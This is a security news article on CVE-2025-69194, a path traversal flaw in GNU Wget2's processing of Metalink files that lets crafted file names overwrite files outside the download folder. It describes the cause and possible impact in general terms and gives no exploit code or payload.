GNU Wget2 Vulnerability Enables Remote File Overwrite Attacks

A high-severity security flaw has been discovered in GNU Wget2, a popular command-line tool used for downloading files from the web.

The vulnerability, tracked as CVE-2025-69194, allows remote attackers to overwrite files on a user’s computer without their permission.

This issue is rated as Important with a CVSS score of 8.8 (High), indicating a significant risk to users who rely on the tool for downloading content.

How the Attack Works

The vulnerability stems from how Wget2 handles Metalink documents that contain multiple ways to download a single file (such as mirrors or peer-to-peer links).

Usually, when Wget2 processes a Metalink file, it should strictly control where the downloaded files are saved.

However, security researchers from Apache found that the application fails to verify the file paths listed in these Metalink documents correctly.

This flaw is known as a Path Traversal vulnerability. By creating a malicious Metalink file with “tricked” file names (often using ../ characters), an attacker can escape the download folder.

If a user downloads and processes this malicious file, the attacker can force Wget2 to write data to unauthorised locations on the system.

The consequences of this flaw are serious. If exploited, an attacker could:

• Overwrite critical files: Important system files or user documents could be replaced or corrupted, leading to permanent data loss.
• Execute malicious code: By overwriting configuration files or scripts that the computer runs automatically, an attacker could potentially gain control over the user’s system.
• Bypass security: Attackers could modify password files or security settings to lock users out or create backdoors.

While the attack requires a user to interact with a malicious file, the potential damage makes this a critical issue to be aware of.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.